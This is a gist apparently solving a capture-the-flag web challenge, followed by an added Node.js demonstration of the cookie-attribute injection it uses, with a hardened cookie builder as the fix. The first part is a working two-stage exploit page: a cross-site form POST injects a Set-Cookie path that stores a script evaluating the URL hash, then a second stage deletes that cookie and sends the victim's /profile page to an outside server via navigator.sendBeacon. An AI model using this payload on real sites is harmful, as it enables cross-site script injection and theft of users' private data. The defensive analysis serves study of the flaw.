Created November 6, 2022 10:23
The Real Monster
<iframe name="xxx"></iframe>
<form method=POST target=xxx action="">
<!-- The username closes the server's JSON cookie value and appends its own attributes: the reflected <script> ends up in a
     cookie scoped to Path=/profile (sent ahead of the real session cookie there), and SameSite=none;Secure lets the cross-site iframe POST set it -->
<input name="username" value='<script>eval(unescape(location.hash.slice(1)))</script>","password":"123"};SameSite=none;Secure;Path=/profile;'>
<input name="password" value="123">
</form>
<script>
(async () =>{
const sleep = d => new Promise(r=>setTimeout(r,d));
// Second stage, eval'd from location.hash by the stored <script> on /profile: repeat the injection with an Expires in the past
// to delete the Path=/profile cookie, then read /profile with the victim's real session and exfiltrate it.
const payload = `
fetch('/login', {
headers: {'content-type': 'application/x-www-form-urlencoded'},
method: 'POST',
body: 'password=123&username=terjanq","password":"123"};SameSite=none;Secure;Path=/profile;expires=Thu, 01 Jan 1970 00:00:01 GMT;'
});
setTimeout(() => {
fetch('/profile').then(e=>e.text()).then(e=>navigator.sendBeacon('https://server', e));
}, 1000);
`;
// Assumed: the gist as extracted shows no explicit submit, but the form must be posted for the cookie to be set
document.forms[0].submit();
await sleep(2000);
// action="" above and '' here are left empty as in the gist; they stand for the target's /login and /profile URLs
location = ''+escape(payload);
})();
</script>
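Added example, not code from the gist or from the challenge it targets: it models the Set-Cookie attribute injection both stages of the payload rely on. It assumes the server concatenates the submitted username into a JSON-looking cookie value without encoding (which is what the `","password":"123"};SameSite=none;...` suffix implies); the server's real code is not in the gist, so buildSetCookieNaive, buildSetCookieSafe, parseSetCookie, cookieEffect, demo and the STAGE1/STAGE2 constants are all hypothetical names written for this example. The parser follows RFC 6265 so you can see which attributes the browser would actually honour, and the hardened builder shows the fix: escape and percent-encode the value so a client can never terminate it.

```javascript
// Added example, not from the gist: models the cookie-attribute injection the payload uses.
// ASSUMPTION: the challenge server concatenates user input into a JSON-looking cookie value;
// buildSetCookieNaive/buildSetCookieSafe are hypothetical stand-ins for its real code.

// Vulnerable stand-in: the username goes straight into the cookie value and no Path is set,
// so a ';' in the username starts attributes the client controls.
function buildSetCookieNaive(username, password) {
  return `user={"username":"${username}","password":"${password}"}`;
}

// Hardened stand-in: JSON.stringify escapes the quotes and encodeURIComponent removes ';'
// and '=' from the value, so the client cannot append attributes; attributes stay fixed.
function buildSetCookieSafe(username, password) {
  const value = encodeURIComponent(JSON.stringify({ username, password }));
  return `user=${value}; Path=/; HttpOnly; SameSite=Lax`;
}

// Minimal Set-Cookie parser after RFC 6265 section 5.2: split on ';', the first piece is
// name=value, the rest are attributes (names case-insensitive; later duplicates win).
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';');
  const eq = pair.indexOf('=');
  const cookie = { name: pair.slice(0, eq).trim(), value: pair.slice(eq + 1).trim(), attrs: {} };
  for (const piece of rest) {
    const p = piece.trim();
    if (!p) continue;
    const i = p.indexOf('=');
    const name = (i === -1 ? p : p.slice(0, i)).trim().toLowerCase();
    cookie.attrs[name] = i === -1 ? '' : p.slice(i + 1).trim();
  }
  return cookie;
}

// What a browser would do with the header: the effective Path (default '/' for a response
// to /login), whether a cross-site iframe POST may set it (SameSite=None requires Secure),
// and whether an Expires in the past deletes it, which is how stage two removes the cookie.
function cookieEffect(header) {
  const c = parseSetCookie(header);
  const exp = 'expires' in c.attrs ? new Date(c.attrs.expires).getTime() : NaN;
  return {
    name: c.name,
    path: 'path' in c.attrs ? c.attrs.path : '/',
    crossSiteSettable: (c.attrs.samesite || '').toLowerCase() === 'none' && 'secure' in c.attrs,
    deleted: !Number.isNaN(exp) && exp <= Date.now(),
    // After the percent-decoding a server would apply, the value still parses as JSON:
    // the injected attributes were cut off at the first ';', so the stored <script> survives.
    valueIsJson: (() => { try { JSON.parse(decodeURIComponent(c.value)); return true; } catch { return false; } })(),
  };
}

// The two usernames from the gist, constructed inline so this runs offline.
const STAGE1 = '<script>eval(unescape(location.hash.slice(1)))</script>","password":"123"};SameSite=none;Secure;Path=/profile;';
const STAGE2 = 'terjanq","password":"123"};SameSite=none;Secure;Path=/profile;expires=Thu, 01 Jan 1970 00:00:01 GMT;';

function demo() {
  return {
    stage1: cookieEffect(buildSetCookieNaive(STAGE1, '123')),
    stage2: cookieEffect(buildSetCookieNaive(STAGE2, '123')),
    hardened: cookieEffect(buildSetCookieSafe(STAGE1, '123')),
  };
}

console.log(demo());
```

Run with `node`: stage1 comes back with path `/profile` and crossSiteSettable true, stage2 additionally with deleted true, and the hardened header keeps path `/` with no SameSite=None. Whether the injected cookie actually shadows the session on /profile also depends on the server reading the first `user` cookie it receives, which RFC 6265 orders longest-path first; that part is an assumption about the challenge, not something the gist states.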